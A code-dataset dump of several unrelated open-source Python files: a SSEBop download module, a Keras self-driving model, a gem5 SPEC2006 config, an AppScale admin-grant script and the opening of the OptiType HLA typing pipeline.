] | 1 | 2017-06-17T08:07:53.000Z | 2017-08-22T12:28:37.000Z | Collect/SSEBop/__init__.py | wateraccounting/wa | 29ed8e7eac732135678a5d171cd5e53a54c95313 | [
"Apache-2.0"
] | 19 | 2016-10-24T13:24:34.000Z | 2020-02-03T17:42:22.000Z | # -*- coding: utf-8 -*-
"""
Authors: Tim Hessels and Gonzalo Espinoza
UNESCO-IHE 2017
Contact: t.hessels@unesco-ihe.org
g.espinoza@unesco-ihe.org
Repository: https://github.com/wateraccounting/wa
Module: Collect/SSEBop
Restrictions:
The data and this python file may not be distributed to others without
permission of the WA+ team due data restriction of the SSEBop developers.
Description:
This module downloads SSEBop data from
ftp.wateraccounting.unesco-ihe.org. Use the SSEBop.monthly function to
download and create monthly SSEBop images in Gtiff format.
Data is available between 2003-01-01 till 2014-10-31. If the FTP version is used
The data goes till present if the V4 version is used (Default)
Examples:
from wa.Collect import SSEBop
SSEBop.monthly(Dir='C:/Temp/', Startdate='2008-12-01', Enddate='2011-01-20',
latlim=[-10, 30], lonlim=[-20, -10])
"""
from .monthly import main as monthly
__all__ = ['monthly']
__version__ = '0.1'
| 30.5 | 80 | 0.740779 |
5ed5cc698e22b8fb8698cbf77b6e7774c3a542ae | 4,446 | py | Python | model.py | shakeelr/CarND-Behavioral-Cloning-P3 | 8542a965a329fe38722e67a206ca19ad03d912bb | [
"MIT"
] | null | null | null | model.py | shakeelr/CarND-Behavioral-Cloning-P3 | 8542a965a329fe38722e67a206ca19ad03d912bb | [
"MIT"
] | null | null | null | model.py | shakeelr/CarND-Behavioral-Cloning-P3 | 8542a965a329fe38722e67a206ca19ad03d912bb | [
"MIT"
] | null | null | null | import sklearn
import csv
import cv2
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from keras.models import Sequential
from keras.layers import Flatten, Dense, Lambda, Cropping2D, BatchNormalization, Dropout, Activation
from keras.layers.convolutional import Convolution2D
from keras.layers.pooling import MaxPooling2D
#read the CSV file
samples = []
with open('./data/driving_log_merged.csv') as csvfile:
reader = csv.reader(csvfile)
for line in reader:
samples.append(line)
#Pop out the first line containing column labels
samples.pop(0)
#generator function for generating batches
def generator(samples, batch_size=64):
num_samples = len(samples)
correction = 0.20
while 1: # Loop forever so the generator never terminates
sklearn.utils.shuffle(samples)
for offset in range(0, num_samples, batch_size):
batch_samples = samples[offset:offset+batch_size]
images = []
angles = []
for batch_sample in batch_samples:
#images are augmented with left/right camera angles
center_name = './data/IMG/'+batch_sample[0].split('/')[-1]
left_name = './data/IMG/'+batch_sample[1].split('/')[-1]
right_name = './data/IMG/'+batch_sample[2].split('/')[-1]
center_image = cv2.imread(center_name)
left_image = cv2.imread(left_name)
right_image = cv2.imread(right_name)
center_angle = float(batch_sample[3])
left_angle = center_angle + correction
right_angle = center_angle - correction
images.append(center_image)
angles.append(center_angle)
images.append(cv2.flip(center_image,1))
angles.append(center_angle*-1.0)
images.append(left_image)
angles.append(left_angle)
images.append(cv2.flip(left_image,1))
angles.append(left_angle*-1.0)
images.append(right_image)
angles.append(right_angle)
images.append(cv2.flip(right_image,1))
angles.append(right_angle*-1.0)
X_train = np.array(images)
y_train = np.array(angles)
yield sklearn.utils.shuffle(X_train, y_train)
#split the data into training and valadation sets
train_samples, valid_samples = train_test_split(samples, test_size=0.20)
#training/validation variables
train_generator = generator(train_samples, batch_size=150)
valid_generator = generator(valid_samples, batch_size=150)
# I used a model similar to the NVidia self driving car model, with
# the addition of Batch Normalization layers to reduce overfitting
model = Sequential()
model.add(Lambda(lambda x: (x / 255.0) - 0.5, input_shape=(160,320,3)))
model.add(Cropping2D(cropping=((70,25),(0,0))))
model.add(Convolution2D(24,5,5,subsample=(2,2)))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Convolution2D(36,5,5,subsample=(2,2)))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Convolution2D(48,5,5,subsample=(2,2)))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Convolution2D(64,3,3))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Convolution2D(64,3,3))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Flatten())
model.add(Dense(100))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Dense(50))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Dense(10))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Dense(1))
model.compile(loss='mse', optimizer='adam')
#train the model
history_object = model.fit_generator(train_generator, samples_per_epoch=len(train_samples)*6, validation_data=valid_generator,
nb_val_samples=len(valid_samples)*6, nb_epoch=30)
#save the model
model.save('model.h5')
#plot training history
print(history_object.history.keys())
plt.plot(history_object.history['loss'])
plt.plot(history_object.history['val_loss'])
plt.title('model mean squared error loss')
plt.ylabel('mean squared error loss')
plt.xlabel('epoch')
plt.legend(['training set', 'validation set'], loc='upper right')
plt.show() | 34.2 | 127 | 0.680387 |
46781aa5acd71fd53b325d04589df23128000b74 | 14,570 | py | Python | configs/example/spec06_config.py | irene-lin/InvisiSpec-1.0 | 696ceb57d48f77da1385f2c9e10dc4615350e607 | [
"BSD-3-Clause"
] | 2 | 2020-03-05T23:49:12.000Z | 2020-03-07T22:12:42.000Z | configs/example/spec06_config.py | irene-lin/InvisiSpec-1.0 | 696ceb57d48f77da1385f2c9e10dc4615350e607 | [
"BSD-3-Clause"
] | null | null | null | configs/example/spec06_config.py | irene-lin/InvisiSpec-1.0 | 696ceb57d48f77da1385f2c9e10dc4615350e607 | [
"BSD-3-Clause"
] | 1 | 2020-09-27T06:39:53.000Z | 2020-09-27T06:39:53.000Z | # Copyright (c) 2012-2013 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2006-2008 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Steve Reinhardt
# Simple test script
#
# "m5 test.py"
import optparse
import sys
import os
import m5
from m5.defines import buildEnv
from m5.objects import *
from m5.util import addToPath, fatal, warn
addToPath('../')
from ruby import Ruby
from common import Options
from common import Simulation
from common import CacheConfig
from common import CpuConfig
from common import MemConfig
from common.Caches import *
from common.cpu2000 import *
import spec06_benchmarks
# Check if KVM support has been enabled, we might need to do VM
# configuration if that's the case.
have_kvm_support = 'BaseKvmCPU' in globals()
def is_kvm_cpu(cpu_class):
return have_kvm_support and cpu_class != None and \
issubclass(cpu_class, BaseKvmCPU)
def get_processes(options):
"""Interprets provided options and returns a list of processes"""
multiprocesses = []
inputs = []
outputs = []
errouts = []
pargs = []
workloads = options.cmd.split(';')
if options.input != "":
inputs = options.input.split(';')
if options.output != "":
outputs = options.output.split(';')
if options.errout != "":
errouts = options.errout.split(';')
if options.options != "":
pargs = options.options.split(';')
idx = 0
for wrkld in workloads:
process = Process(pid = 100 + idx)
process.executable = wrkld
process.cwd = os.getcwd()
if options.env:
with open(options.env, 'r') as f:
process.env = [line.rstrip() for line in f]
if len(pargs) > idx:
process.cmd = [wrkld] + pargs[idx].split()
else:
process.cmd = [wrkld]
if len(inputs) > idx:
process.input = inputs[idx]
if len(outputs) > idx:
process.output = outputs[idx]
if len(errouts) > idx:
process.errout = errouts[idx]
multiprocesses.append(process)
idx += 1
if options.smt:
assert(options.cpu_type == "DerivO3CPU")
return multiprocesses, idx
else:
return multiprocesses, 1
parser = optparse.OptionParser()
Options.addCommonOptions(parser)
Options.addSEOptions(parser)
parser.add_option("-b", "--benchmark", type="string", default="", help="The SPEC benchmark to be loaded.")
parser.add_option("--benchmark_stdout", type="string", default="", help="Absolute path for stdout redirection for the benchmark.")
parser.add_option("--benchmark_stderr", type="string", default="", help="Absolute path for stderr redirection for the benchmark.")
if '--ruby' in sys.argv:
Ruby.define_options(parser)
(options, args) = parser.parse_args()
if args:
print "Error: script doesn't take any positional arguments"
sys.exit(1)
#multiprocesses = []
numThreads = 1
if options.benchmark:
print 'Selected SPEC_CPU2006 benchmark'
if options.benchmark == 'perlbench':
print '--> perlbench'
process = spec06_benchmarks.perlbench
elif options.benchmark == 'bzip2':
print '--> bzip2'
process = spec06_benchmarks.bzip2
elif options.benchmark == 'gcc':
print '--> gcc'
process = spec06_benchmarks.gcc
elif options.benchmark == 'bwaves':
print '--> bwaves'
process = spec06_benchmarks.bwaves
elif options.benchmark == 'gamess':
print '--> gamess'
process = spec06_benchmarks.gamess
elif options.benchmark == 'mcf':
print '--> mcf'
process = spec06_benchmarks.mcf
elif options.benchmark == 'milc':
print '--> milc'
process = spec06_benchmarks.milc
elif options.benchmark == 'zeusmp':
print '--> zeusmp'
process = spec06_benchmarks.zeusmp
elif options.benchmark == 'gromacs':
print '--> gromacs'
process = spec06_benchmarks.gromacs
elif options.benchmark == 'cactusADM':
print '--> cactusADM'
process = spec06_benchmarks.cactusADM
elif options.benchmark == 'leslie3d':
print '--> leslie3d'
process = spec06_benchmarks.leslie3d
elif options.benchmark == 'namd':
print '--> namd'
process = spec06_benchmarks.namd
elif options.benchmark == 'gobmk':
print '--> gobmk'
process = spec06_benchmarks.gobmk
elif options.benchmark == 'dealII':
print '--> dealII'
process = spec06_benchmarks.dealII
elif options.benchmark == 'soplex':
print '--> soplex'
process = spec06_benchmarks.soplex
elif options.benchmark == 'povray':
print '--> povray'
process = spec06_benchmarks.povray
elif options.benchmark == 'calculix':
print '--> calculix'
process = spec06_benchmarks.calculix
elif options.benchmark == 'hmmer':
print '--> hmmer'
process = spec06_benchmarks.hmmer
elif options.benchmark == 'sjeng':
print '--> sjeng'
process = spec06_benchmarks.sjeng
elif options.benchmark == 'GemsFDTD':
print '--> GemsFDTD'
process = spec06_benchmarks.GemsFDTD
elif options.benchmark == 'libquantum':
print '--> libquantum'
process = spec06_benchmarks.libquantum
elif options.benchmark == 'h264ref':
print '--> h264ref'
process = spec06_benchmarks.h264ref
elif options.benchmark == 'tonto':
print '--> tonto'
process = spec06_benchmarks.tonto
elif options.benchmark == 'lbm':
print '--> lbm'
process = spec06_benchmarks.lbm
elif options.benchmark == 'omnetpp':
print '--> omnetpp'
process = spec06_benchmarks.omnetpp
elif options.benchmark == 'astar':
print '--> astar'
process = spec06_benchmarks.astar
elif options.benchmark == 'wrf':
print '--> wrf'
process = spec06_benchmarks.wrf
elif options.benchmark == 'sphinx3':
print '--> sphinx3'
process = spec06_benchmarks.sphinx3
elif options.benchmark == 'xalancbmk':
print '--> xalancbmk'
process = spec06_benchmarks.xalancbmk
elif options.benchmark == 'specrand_i':
print '--> specrand_i'
process = spec06_benchmarks.specrand_i
elif options.benchmark == 'specrand_f':
print '--> specrand_f'
process = spec06_benchmarks.specrand_f
else:
print "No recognized SPEC2006 benchmark selected! Exiting."
sys.exit(1)
else:
print >> sys.stderr, "Need --benchmark switch to specify SPEC CPU2006 workload. Exiting!\n"
sys.exit(1)
# Set process stdout/stderr
if options.benchmark_stdout:
process.output = options.benchmark_stdout
print "Process stdout file: " + process.output
if options.benchmark_stderr:
process.errout = options.benchmark_stderr
print "Process stderr file: " + process.errout
#if options.bench:
# apps = options.bench.split("-")
# if len(apps) != options.num_cpus:
# print "number of benchmarks not equal to set num_cpus!"
# sys.exit(1)
#
# for app in apps:
# try:
# if buildEnv['TARGET_ISA'] == 'alpha':
# exec("workload = %s('alpha', 'tru64', '%s')" % (
# app, options.spec_input))
# elif buildEnv['TARGET_ISA'] == 'arm':
# exec("workload = %s('arm_%s', 'linux', '%s')" % (
# app, options.arm_iset, options.spec_input))
# else:
# exec("workload = %s(buildEnv['TARGET_ISA', 'linux', '%s')" % (
# app, options.spec_input))
# multiprocesses.append(workload.makeProcess())
# except:
# print >>sys.stderr, "Unable to find workload for %s: %s" % (
# buildEnv['TARGET_ISA'], app)
# sys.exit(1)
#elif options.cmd:
# multiprocesses, numThreads = get_processes(options)
#else:
# print >> sys.stderr, "No workload specified. Exiting!\n"
# sys.exit(1)
(CPUClass, test_mem_mode, FutureClass) = Simulation.setCPUClass(options)
CPUClass.numThreads = numThreads
# Check -- do not allow SMT with multiple CPUs
if options.smt and options.num_cpus > 1:
fatal("You cannot use SMT with multiple CPUs!")
np = options.num_cpus
system = System(cpu = [CPUClass(cpu_id=i) for i in xrange(np)],
mem_mode = test_mem_mode,
mem_ranges = [AddrRange(options.mem_size)],
cache_line_size = options.cacheline_size)
if numThreads > 1:
system.multi_thread = True
# Create a top-level voltage domain
system.voltage_domain = VoltageDomain(voltage = options.sys_voltage)
# Create a source clock for the system and set the clock period
system.clk_domain = SrcClockDomain(clock = options.sys_clock,
voltage_domain = system.voltage_domain)
# Create a CPU voltage domain
system.cpu_voltage_domain = VoltageDomain()
# Create a separate clock domain for the CPUs
system.cpu_clk_domain = SrcClockDomain(clock = options.cpu_clock,
voltage_domain =
system.cpu_voltage_domain)
# If elastic tracing is enabled, then configure the cpu and attach the elastic
# trace probe
if options.elastic_trace_en:
CpuConfig.config_etrace(CPUClass, system.cpu, options)
# All cpus belong to a common cpu_clk_domain, therefore running at a common
# frequency.
for cpu in system.cpu:
cpu.clk_domain = system.cpu_clk_domain
if is_kvm_cpu(CPUClass) or is_kvm_cpu(FutureClass):
if buildEnv['TARGET_ISA'] == 'x86':
system.kvm_vm = KvmVM()
for process in multiprocesses:
process.useArchPT = True
process.kvmInSE = True
else:
fatal("KvmCPU can only be used in SE mode with x86")
# Sanity check
if options.fastmem:
if CPUClass != AtomicSimpleCPU:
fatal("Fastmem can only be used with atomic CPU!")
if (options.caches or options.l2cache):
fatal("You cannot use fastmem in combination with caches!")
if options.simpoint_profile:
if not options.fastmem:
# Atomic CPU checked with fastmem option already
fatal("SimPoint generation should be done with atomic cpu and fastmem")
if np > 1:
fatal("SimPoint generation not supported with more than one CPUs")
for i in xrange(np):
system.cpu[i].workload = process
print process.cmd
#if options.smt:
# system.cpu[i].workload = multiprocesses
#elif len(multiprocesses) == 1:
# system.cpu[i].workload = multiprocesses[0]
#else:
# system.cpu[i].workload = multiprocesses[i]
if options.fastmem:
system.cpu[i].fastmem = True
if options.simpoint_profile:
system.cpu[i].addSimPointProbe(options.simpoint_interval)
if options.checker:
system.cpu[i].addCheckerCpu()
system.cpu[i].createThreads()
if options.ruby:
Ruby.create_system(options, False, system)
assert(options.num_cpus == len(system.ruby._cpu_ports))
system.ruby.clk_domain = SrcClockDomain(clock = options.ruby_clock,
voltage_domain = system.voltage_domain)
for i in xrange(np):
ruby_port = system.ruby._cpu_ports[i]
# Create the interrupt controller and connect its ports to Ruby
# Note that the interrupt controller is always present but only
# in x86 does it have message ports that need to be connected
system.cpu[i].createInterruptController()
# Connect the cpu's cache ports to Ruby
system.cpu[i].icache_port = ruby_port.slave
system.cpu[i].dcache_port = ruby_port.slave
if buildEnv['TARGET_ISA'] == 'x86':
system.cpu[i].interrupts[0].pio = ruby_port.master
system.cpu[i].interrupts[0].int_master = ruby_port.slave
system.cpu[i].interrupts[0].int_slave = ruby_port.master
system.cpu[i].itb.walker.port = ruby_port.slave
system.cpu[i].dtb.walker.port = ruby_port.slave
else:
MemClass = Simulation.setMemClass(options)
system.membus = SystemXBar()
system.system_port = system.membus.slave
CacheConfig.config_cache(options, system)
MemConfig.config_mem(options, system)
# [InvisiSpec] Configure simulation scheme
if CPUClass == DerivO3CPU:
CpuConfig.config_scheme(CPUClass, system.cpu, options)
root = Root(full_system = False, system = system)
Simulation.run(options, root, system, FutureClass)
| 35.798526 | 130 | 0.664653 |
6ca6a411eb5dc75a501b2e18ae7eb65bc635797c | 1,437 | py | Python | scripts/grant_cloud_admin.py | eabyshev/appscale | 1cfb5a609130f415143ec76718e839b0f73ac668 | [
"Apache-2.0"
] | null | null | null | scripts/grant_cloud_admin.py | eabyshev/appscale | 1cfb5a609130f415143ec76718e839b0f73ac668 | [
"Apache-2.0"
] | null | null | null | scripts/grant_cloud_admin.py | eabyshev/appscale | 1cfb5a609130f415143ec76718e839b0f73ac668 | [
"Apache-2.0"
] | 1 | 2021-11-23T08:30:52.000Z | 2021-11-23T08:30:52.000Z | """ Grants cloud admin access to a user. """
import os
import SOAPpy
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "../lib"))
import appscale_info
import constants
def get_soap_accessor():
""" Returns the SOAP server accessor to deal with application and users.
Returns:
A soap server accessor.
"""
db_ip = appscale_info.get_db_master_ip()
bindport = constants.UA_SERVER_PORT
return SOAPpy.SOAPProxy("https://{0}:{1}".format(db_ip, bindport))
def usage():
""" Prints the usage of this script. """
print ""
print "Grants cloud admin access to user for an AppScale cloud."
print "Args: email address"
print " an application ID."
print ""
print "Example:"
print " python add_admin_to_app.py bob@appscale.com"
print ""
if __name__ == "__main__":
total = len(sys.argv)
if total < 2:
usage()
exit(1)
email = sys.argv[1]
secret = appscale_info.get_secret()
server = get_soap_accessor()
if server.does_user_exist(email, secret) == "false":
print "User does not exist."
exit(1)
ret = server.set_cloud_admin_status(email, "true", secret)
if ret == "true":
print "{0} granted cloud admin access.".format(email)
else:
print "Error with user: {0} -- {1}".format(email, ret)
# Verify cloud admin status.
if server.is_user_cloud_admin(email, secret) != "true":
print "ERROR! Unable to verify that the user is now a cloud admin!"
| 25.660714 | 74 | 0.68128 |
8cfbc740a516692123ffb92c6ed4858ca26324d9 | 23,455 | py | Python | OptiTypePipeline.py | naumenko-sa/OptiType | 07c49bf6fc93e8846e8826df63100a0b069cbe40 | [
"BSD-3-Clause"
] | 137 | 2015-02-05T12:56:11.000Z | 2022-03-10T12:46:45.000Z | OptiTypePipeline.py | naumenko-sa/OptiType | 07c49bf6fc93e8846e8826df63100a0b069cbe40 | [
"BSD-3-Clause"
] | 98 | 2015-01-15T01:30:35.000Z | 2022-03-22T22:30:48.000Z | OptiTypePipeline.py | naumenko-sa/OptiType | 07c49bf6fc93e8846e8826df63100a0b069cbe40 | [
"BSD-3-Clause"
] | 76 | 2015-03-19T19:44:06.000Z | 2021-04-22T15:56:35.000Z | #!/usr/bin/env python
# coding=utf-8
"""
###################################################################
OptiType: precision HLA typing from next-generation sequencing data
###################################################################
Authors: András Szolek, Benjamin Schubert, Christopher Mohr
Date: August 2017
Version: 1.3.1
License: OptiType is released under a three-clause BSD license
Introduction:
-------------
OptiType, is a novel HLA genotyping algorithm based on integer linear
programming, capable of producing accurate 4-digit HLA genotyping predictions
from NGS data by simultaneously selecting all minor and major HLA-I alleles.
Requirements:
-------------
OptiType uses the following software and libraries:
1) Python 2.7
2) Biopython 1.63
3) Pyomo 4.1
4) Matplotlib 1.3.1
5) Pandas 0.12 (with HDF5 support)
6) HDF5 1.8.11
7) RazerS 3.1
8) Cplex 12.5
Please make sure you have installed said software/libraries
and their dependencies.
Installation:
-------------
First install all required software and libraries and register the static path
in the configuration file for RazerS 3.1. CPLEX should be globally executable
via command line. Alternative ILP solver supported by Cooper are also usable.
Please do not change the folder structure or make sure you changed the necessary
entries in the config file.
Usage:
-------------
1) First filter the read files with the following settings:
>razers3 --percent-identity 90 --max-hits 1 --distance-range 0
--output-format sam --output sample_fished.sam
./data/hla_reference.fasta sample.fastq
where reference.fasta is either nuc_reference.fasta or gen_reference.fasta
depending on the type of NGS data. The references can be found in the ./data
sub-folder or in the supplementary material. To use the results as input
for OptiType the sam-files have to be converted into fastq format. On Unix-
based operating system you can convert from sam to fastq with the following
command:
>cat sample_fished.sam | grep -v ^@
| awk '{print "@"$1"\n"$10"\n+\n"$11}' > sample_fished.fastq
For paired-end data pre-process each file individually.
2) After pre-filtering, OptiType can be called as follows:
>python OptiTypePipeline.py -i sample_fished_1.fastq [sample_fished_2.fastq]
(--rna | --dna) [--beta BETA] [--enumerate ENUMERATE]
--o ./out_dir/
This will produce a CSV with the optimal typing and possible sub-optimal
typings if specified, as well as a coverage plot of the genotype for
diagnostic purposes and a HTML file containing a summary of the results.
>python OptiTypePipeline.py --help
usage: OptiType [-h] --input INPUT [INPUT ...] (--rna | --dna) [--beta BETA]
[--enumerate ENUMERATE] --outdir OUTDIR [--verbose]
OptiType: 4-digit HLA typer
optional arguments:
-h, --help show this help message and exit
--input INPUT [INPUT ...], -i INPUT [INPUT ...]
Fastq files with fished HLA reads. Max two files (for
paired-end)
--rna, -r Specifiying the mapped data as RNA.
--dna, -d Specifiying the mapped data as DNA.
--beta BETA, -b BETA The beta value for for homozygosity detection.
--enumerate ENUMERATE, -e ENUMERATE
The number of enumerations.
--outdir OUTDIR, -o OUTDIR
Specifies the out directory to which all files should
be written
--verbose, -v Set verbose mode on.
"""
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import zip
from builtins import filter
from builtins import map
from builtins import range
## eliminate dependency on an X11 server
import matplotlib
matplotlib.use('Agg')
import sys
import subprocess
import os
import argparse
if sys.version_info > (3,0):
import configparser
else:
import ConfigParser as configparser
import time
import datetime
import pandas as pd
import hlatyper as ht
import numpy as np
from model import OptiType
from collections import defaultdict
# Try to import pysam, important for RazerS 3 output format
try:
import pysam
PYSAM_AVAILABLE = True
except ImportError:
PYSAM_AVAILABLE = False
freq_alleles = '''A*01:01 A*01:02 A*01:03 A*01:06 A*01:09 A*01:23 A*01:38 A*01:44 A*02:01 A*02:02 A*02:03 A*02:04 A*02:05 A*02:06 A*02:07 A*02:08 A*02:09 A*02:10 A*02:11 A*02:12 A*02:13 A*02:133 A*02:14 A*02:141 A*02:146 A*02:15N A*02:16 A*02:17 A*02:18 A*02:19 A*02:20 A*02:21 A*02:22 A*02:226N A*02:24 A*02:25 A*02:26 A*02:27 A*02:28 A*02:29 A*02:30 A*02:33 A*02:34 A*02:35 A*02:36 A*02:37 A*02:38 A*02:40 A*02:42 A*02:44 A*02:45 A*02:46 A*02:48 A*02:49 A*02:51 A*02:53N A*02:54 A*02:55 A*02:57 A*02:58 A*02:60 A*02:64 A*02:67 A*02:74 A*02:85 A*02:90 A*02:93 A*03:01 A*03:02 A*03:05 A*03:07 A*03:08 A*03:10 A*03:12 A*03:22 A*03:25 A*03:65 A*03:69N A*03:97 A*11:01 A*11:02 A*11:03 A*11:04 A*11:05 A*11:06 A*11:08 A*11:10 A*11:12 A*11:13 A*11:18 A*11:19 A*11:20 A*11:29 A*11:40 A*23:01 A*23:02 A*23:03 A*23:04 A*23:05 A*23:09 A*24:02 A*24:03 A*24:04 A*24:05 A*24:06 A*24:07 A*24:08 A*24:09N A*24:10 A*24:13 A*24:14 A*24:15 A*24:17 A*24:18 A*24:20 A*24:21 A*24:22 A*24:23 A*24:24 A*24:25 A*24:26 A*24:27 A*24:28 A*24:29 A*24:31 A*24:35 A*24:46 A*24:51 A*24:56 A*24:63 A*24:93 A*25:01 A*25:02 A*25:04 A*26:01 A*26:02 A*26:03 A*26:04 A*26:05 A*26:06 A*26:07 A*26:08 A*26:09 A*26:10 A*26:11N A*26:12 A*26:14 A*26:15 A*26:16 A*26:17 A*26:18 A*26:20 A*26:49 A*29:01 A*29:02 A*29:03 A*29:04 A*29:10 A*29:12 A*30:01 A*30:02 A*30:03 A*30:04 A*30:06 A*30:08 A*30:09 A*30:10 A*30:11 A*30:12 A*30:16 A*31:01 A*31:02 A*31:03 A*31:04 A*31:05 A*31:06 A*31:08 A*31:09 A*31:12 A*32:01 A*32:02 A*32:03 A*32:04 A*32:05 A*32:06 A*32:08 A*32:13 A*32:20 A*32:22 A*33:01 A*33:03 A*33:04 A*33:05 A*33:10 A*33:26 A*34:01 A*34:02 A*34:03 A*34:05 A*36:01 A*36:03 A*43:01 A*66:01 A*66:02 A*66:03 A*68:01 A*68:02 A*68:03 A*68:04 A*68:05 A*68:06 A*68:07 A*68:08 A*68:12 A*68:13 A*68:15 A*68:16 A*68:17 A*68:18N A*68:23 A*68:24 A*68:38 A*69:01 A*74:01 A*74:02 A*74:03 A*74:04 A*74:06 A*74:09 A*74:11 A*80:01 A*80:02 B*07:02 B*07:03 B*07:04 B*07:05 B*07:06 B*07:07 B*07:08 B*07:09 B*07:10 B*07:12 B*07:13 B*07:14 B*07:15 B*07:17 B*07:20 B*07:22 B*07:26 B*07:33 B*07:36 B*07:47 B*07:53 B*07:85 B*08:01 B*08:02 B*08:03 B*08:04 B*08:05 B*08:09 B*08:12 B*08:18 B*08:23 B*13:01 B*13:02 B*13:03 B*13:04 B*13:07N B*13:09 B*13:11 B*13:13 B*14:01 B*14:02 B*14:03 B*14:04 B*14:05 B*14:06 B*15:01 B*15:02 B*15:03 B*15:04 B*15:05 B*15:06 B*15:07 B*15:08 B*15:09 B*15:10 B*15:108 B*15:11 B*15:12 B*15:123 B*15:125 B*15:13 B*15:135 B*15:15 B*15:153 B*15:16 B*15:17 B*15:18 B*15:20 B*15:21 B*15:23 B*15:24 B*15:25 B*15:27 B*15:28 B*15:29 B*15:30 B*15:31 B*15:32 B*15:33 B*15:34 B*15:35 B*15:36 B*15:37 B*15:38 B*15:39 B*15:40 B*15:42 B*15:45 B*15:46 B*15:47 B*15:48 B*15:50 B*15:52 B*15:53 B*15:54 B*15:55 B*15:56 B*15:58 B*15:61 B*15:63 B*15:67 B*15:68 B*15:70 B*15:71 B*15:73 B*15:82 B*15:86 B*18:01 B*18:02 B*18:03 B*18:04 B*18:05 B*18:06 B*18:07 B*18:08 B*18:09 B*18:11 B*18:13 B*18:14 B*18:18 B*18:19 B*18:20 B*18:28 B*18:33 B*27:01 B*27:02 B*27:03 B*27:04 B*27:05 B*27:06 B*27:07 B*27:08 B*27:09 B*27:10 B*27:11 B*27:12 B*27:13 B*27:14 B*27:19 B*27:20 B*27:21 B*27:30 B*27:39 B*35:01 B*35:02 B*35:03 B*35:04 B*35:05 B*35:06 B*35:08 B*35:09 B*35:10 B*35:11 B*35:12 B*35:13 B*35:14 B*35:15 B*35:16 B*35:17 B*35:18 B*35:19 B*35:20 B*35:21 B*35:22 B*35:23 B*35:24 B*35:25 B*35:27 B*35:28 B*35:29 B*35:30 B*35:31 B*35:32 B*35:33 B*35:34 B*35:36 B*35:43 B*35:46 B*35:51 B*35:77 B*35:89 B*37:01 B*37:02 B*37:04 B*37:05 B*38:01 B*38:02 B*38:04 B*38:05 B*38:06 B*38:15 B*39:01 B*39:02 B*39:03 B*39:04 B*39:05 B*39:06 B*39:07 B*39:08 B*39:09 B*39:10 B*39:11 B*39:12 B*39:13 B*39:14 B*39:15 B*39:23 B*39:24 B*39:31 B*39:34 B*40:01 B*40:02 B*40:03 B*40:04 B*40:05 B*40:06 B*40:07 B*40:08 B*40:09 B*40:10 B*40:11 B*40:12 B*40:14 B*40:15 B*40:16 B*40:18 B*40:19 B*40:20 B*40:21 B*40:23 B*40:27 B*40:31 B*40:35 B*40:36 B*40:37 B*40:38 B*40:39 B*40:40 B*40:42 B*40:44 B*40:49 B*40:50 B*40:52 B*40:64 B*40:80 B*41:01 B*41:02 B*41:03 B*42:01 B*42:02 B*44:02 B*44:03 B*44:04 B*44:05 B*44:06 B*44:07 B*44:08 B*44:09 B*44:10 B*44:12 B*44:13 B*44:15 B*44:18 B*44:20 B*44:21 B*44:22 B*44:26 B*44:27 B*44:29 B*44:31 B*44:59 B*45:01 B*45:02 B*45:04 B*45:06 B*46:01 B*46:02 B*46:13 B*47:01 B*47:02 B*47:03 B*48:01 B*48:02 B*48:03 B*48:04 B*48:05 B*48:06 B*48:07 B*48:08 B*49:01 B*49:02 B*49:03 B*50:01 B*50:02 B*50:04 B*50:05 B*51:01 B*51:02 B*51:03 B*51:04 B*51:05 B*51:06 B*51:07 B*51:08 B*51:09 B*51:10 B*51:12 B*51:13 B*51:14 B*51:15 B*51:18 B*51:21 B*51:22 B*51:27N B*51:29 B*51:31 B*51:32 B*51:33 B*51:34 B*51:36 B*51:37 B*51:63 B*51:65 B*52:01 B*52:02 B*52:06 B*53:01 B*53:02 B*53:03 B*53:04 B*53:05 B*53:07 B*53:08 B*54:01 B*54:02 B*55:01 B*55:02 B*55:03 B*55:04 B*55:07 B*55:08 B*55:10 B*55:12 B*55:16 B*55:46 B*56:01 B*56:02 B*56:03 B*56:04 B*56:05 B*56:06 B*56:07 B*56:09 B*56:11 B*57:01 B*57:02 B*57:03 B*57:04 B*57:05 B*57:06 B*57:10 B*58:01 B*58:02 B*58:06 